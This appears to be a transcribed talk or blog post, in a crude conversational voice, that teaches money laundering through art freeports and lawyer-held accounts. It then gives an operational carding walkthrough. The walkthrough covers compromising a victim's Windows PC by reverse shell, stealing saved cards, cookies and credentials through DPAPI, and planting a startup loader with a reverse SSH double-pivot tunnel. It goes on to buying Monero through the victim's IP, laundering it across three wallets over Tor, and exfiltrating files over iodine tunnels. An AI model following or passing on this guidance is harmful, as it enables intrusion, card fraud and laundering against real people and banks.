Modern Cybercrime
Modern Money Laundering
OK, so let’s talk about money laundering. It’s kind of a moving target these days on how criminal cybercrime, particularly fraud like ‘carding,’ is going to work. These days, because of automated fraud detection—specifically through AI algorithms, which tend to also implicate or accuse innocent people of fraudulent transactions—you’re going to have to use some more tricks. And no, a VPN within the region of your victim is not going to cut it. So it’s not going to work like 2022 or 2021. For sure.
Just like malware, there’s a scoring system. So if you haven’t tried this, you could have taken like multiple Sektor 7 code templates and then you chained them together for no absolute logical fucking reason, except to give it a main entry point and just try to call as many obfuscation techniques as possible, and it’ll get signatured by Windows Defender. So if you didn’t know that, there was actually a threat scoring, because there is a certain amount of scoring before it’s signatured as certifiable malware, despite the amount of obfuscation, encryption, or virtual machine obfuscation that you may have applied to your payload. This applies to Defender, as well as all third-party vendors, and we’re not even getting to the EDR part. So fraud by itself is a constant moving target.
I am... well, I am not a Certified Public Accountant (CPA). I do hold a Bachelor of Science in Business Administration of Accounting. And I did outperform Beta Alpha Psi for the final exam for Accounting 402, also known as the Statement of Cash Flows, which is much harder. It’s actually the hardest part of financial accounting because you are literally tracing every single dollar—whether it be digitized, wired, or whatever—into the fraudster’s pocket.
So let’s talk about not how to do fraud, but let’s talk about how to make and clean fraudulent money. A lot of people that do not have accounting degrees don’t understand—and we’re not even talking about tax accounting. Tax accounting is actually the dude in Mr. Wolff [The Accountant], in both accountant movies, by the way. But let’s just talk about standard money laundering.
So structuring techniques do not really work anymore because taking a transaction of constantly $3,000 is also suspicious. But it does require things like Benford’s Law. If you have not read things online about Benford’s Law...
But there is an endpoint through which you can launder money, and it’s actually well documented in the book Billion Dollar Whale. So it covers a Malaysian man that likely is probably dead right now because he has never been caught, but he’s likely unable to sustain himself hiding with an Interpol Red Notice. He basically is dead, okay? There’s no way he could have bought himself like a little Bond villain island. But before Interpol dropped that Red Notice, he did screw over Malaysia and [1MDB] investment fund, which also caused a huge political upheaval, of about $10 billion revenue total. High score: $10 billion. He defrauded Malaysia and their investors of $10 billion. He was with A-list celebrities. I thought he was an arms dealer and all those cool gossipy shit. Except he’s probably dead. So don’t be Jho Low.
But what did he do, though? How did he hide his criminal proceeds? So in Geneva, there’s a place that literally is called a Freeport. A Freeport is a mercantile arts gallery. So it does not necessarily mean just paintings. It could be hundreds of millions of dollars of jewelry from Piaget. And so you could have bought yourself—or your hypothetical wife—a necklace, but you still had it on display in the Freeport of Geneva. Now, unfortunately, you’re really only identified by something very much like a bank account number. And because of that, as long as you don’t tie the number to yourself, well, you’re not going to get caught if you actually launch your criminal proceeds into that item, which people can actually look at, but they cannot identify that to you.
It is not only your golden parachute, but it’s also, for example, a golden parachute for your lawyers. When Jho Low finally gets arrested—I’m sure he’s dead. I’m sure he’s a skeleton on some island somewhere, actually. I’m pretty sure he’s dead, okay? Because having an Interpol Red Notice is literally a ban on land, a ban on the air. And as you know, with law enforcement hounding Jho Low’s ass, he has nothing to do but to die drinking seawater because the ocean probably claimed him by water if an undercover cop couldn’t have grabbed his ass off a yacht or something—which is one of the last things he purchased.
But going back, Freeport Geneva is not the only Freeport in the world. There are Freeports... there are thousands of hypothetical—well, not hypothetical, but factually, it is legally a free port. Okay? There are thousands of them. And do you need to actually see the art that you laundered? No, absolutely not. You don’t ever have to see it. So your agent acts as a proxy to funnel the money into this piece of art and sell this value because in some way or form, when money needs to be withdrawn, this item will be sold to someone else, which can fund... I’m not kidding you... operations around the world.
This sounds like a conspiracy theory, but you should probably read and watch the Jason Bourne books and movies. Just the first three: Identity, Supremacy, and Ultimatum, because there is a shadow economy through stolen loot, of which none of these players are really that significant. People gripe about billionaires and what might be very soon a trillionaire, but they don’t understand how shadow money works.
I did see on YouTube about authorized accounts. An authorized account is basically a lawyer that takes mutual custody of your account. So you could be in federal prison right now, and because you called your lawyer, your lawyer is going to take money out of that authorized account to pay on your behalf to hire your huge-ass defense team. Okay? So there’s another thing.
So we started from the basics of fraud and how it’s a constantly moving target, to a most likely place to move millions, if not billions of dollars, across multiple Freeports around the world and authorized accounts, which are the basic elements of big-time money laundering to move those proceeds. And how it has inspired actual fiction. I believe the Bourne series was written in the 60s or the 70s, or maybe the 80s... I don’t know, I think they’re still using rotary phones in these books. But yes. So a lot of the Shadow Economy shit... of course, you can’t fucking trace whether or not this money is really dark and from stolen and dirty money. Of course not. Not by the time it makes it to the Freeport. Until you attribute it back to yourself.
Modern Petty Cybercrime
All right, so this is Chang Tan again. So let’s go back... let’s just teach you the basics of fraud, okay? Obviously, you don’t become a super-duper Kevin Mitnick-level carder, motherfucker, just starting off the bat. And you also don’t need real hacking skills to fucking card someone—outside of the fact that you do need to evade pattern recognition, okay? From AI-assisted... AI-assisted fraud detection.
For that reason, people, when they buy CVV dumps, they either go high or go low. Like, buy some porn, and then go real fucking high with a Monero exchange and get three wallets. Why? Because they’re going to transact maybe five bucks in porn, a thousand bucks in Monero, and then launder it through three wallets behind a VPN. Except the probability of getting caught is not caught by cops—unless they can attribute it—but the probability of getting caught by detection, fraud detection, is pretty high for the laundering part.
Well, actually, let’s go back. Let’s use host-based attacks. Okay? So let’s assume that you can open a reverse shell on your victim, that you just stole CVV information out of their browser, right? You use a Data Protection API [DPAPI] to grab the cred cards saved on their browser from their piece of shit Windows 11 machine, which is just getting easier and easier to own. All right. You drop a hidden binary or maybe some sort of startup loader, and that startup loader creates a Reverse TLS proxy, kind of an SSH-based or just a stupid plink command that runs an SSH reverse tunnel.
And the reason why is you want their actual public IP. And then you also need the credentials from their browser: their actual cookies, safe credentials, and session state. In other words, you’re pretty much already pinging through their machine into their banking account or their credit card in order to put in this Monero transfer.
How difficult is this? You’re thinking the default Windows 10 and up SSH client. You can create a relatively simple [setup] with TCP forwarding SSH double pivot to a C2. It will be really slow, but assuming you’re using their saved credentials off their browser and then just adding it to your browser and using ProxyChains and making the orders through their IP address on their desktop... not a mobile phone, but on their desktop. It should be relatively quick. Mobile devices, you need relatively quick [access] to remove and ban mobile device malware. It’s much harder these days to land it these days than it is back in like the KitKat Android days.
And then you got to launder the money, okay? So wallets like Feather... you got a permanent address, which they highly recommend that you shouldn’t use. And they just put... you put it behind a bunch of warnings. So if we forget about that, because you’re just doing a little one-card swipe, basically. So using your reverse proxy / reverse SSH proxy access, what you got to do is use a temporary public-able Monero address and launder through three wallets, okay? So you’re impersonating your victim who’s making the Monero order to your first wallet in the chain. Then you’re going to launder that money in a smaller segment, so 800 out of that $1,000 from the first wallet to the second, and then something like 600 to the third wallet. You only can spend what’s on the third wallet because Monero is anonymous enough if you use a combination of VPN chaining and its built-in Tor.
If you have not checked this, the Feather Wallet by default will have its own Tor service socket. Port 9150, instead of Port 9050, it’s a default Tor SOCKS. So that means, in other words, it carries its own Tor installation with it. So you don’t even have to install Tor because Tor is slow as fuck. But you could customize it and point it. And the reason why is that the default length of a Tor entrance to next node chain is three to five to be even somewhat usable. You also need to configure it to use an obfuscation bridge, and to do that, you do need either to set up your own node or find any public nodes possible because Monero utilizes Tor to help obfuscate the transactions.
Now the only way that you can get caught up now is if you fuck shit up and try to convert it back into cash for some idiotic reason. Because you can even get gift cards in Monero... I’m not kidding you. Or you can get... like, there’s websites, KYCnot.me, okay? Of course, they’re [in] collaboration with services like... um, illicit transactions, they might sanction a wallet, but you got better odds because No KYC is what? ‘Know Your Customer.’ That doesn’t mean you’re untraceable. It’s really your OpSec, dude.
I mean, think about it. Did you know how you’re being tracked online? Did you know that if you just routed a lot of your interactions on the internet without using a web browser, you’re largely just identified by the User-Agent of the application on the console that you’re using? So if you ran a cURL request to an API endpoint, all they see is the cURL User-Agent behind your VPN chain. Does that make sense?
But that’s like another topic. But just for things like browser fingerprinting, like you could have like had a fresh install of any Linux distro you want. And from that, make sure it’s sanitized to commit your fraud. So did it take a lot of hacking skill? Maybe just to have a foolproof way to launder and extract their original card because you do need remote access to impersonate their public IP through a reverse SSH proxy in a double pivot, but you didn’t have to like open up their browser. You just had to clone their keys that were protected by the Data Protection API.
The idiot proofed method is to simply use proxychains through the compromised endpoint via a double-pivot (in your hardened VM, configure the creds by browser profile, and set proxy settings to proxychains), but... you can use tun2socks.
And bonus stuff. You can also abuse iodine tunnels but it’s inadequate for web browsing. It’s better you just steal critical files one-by-one over it.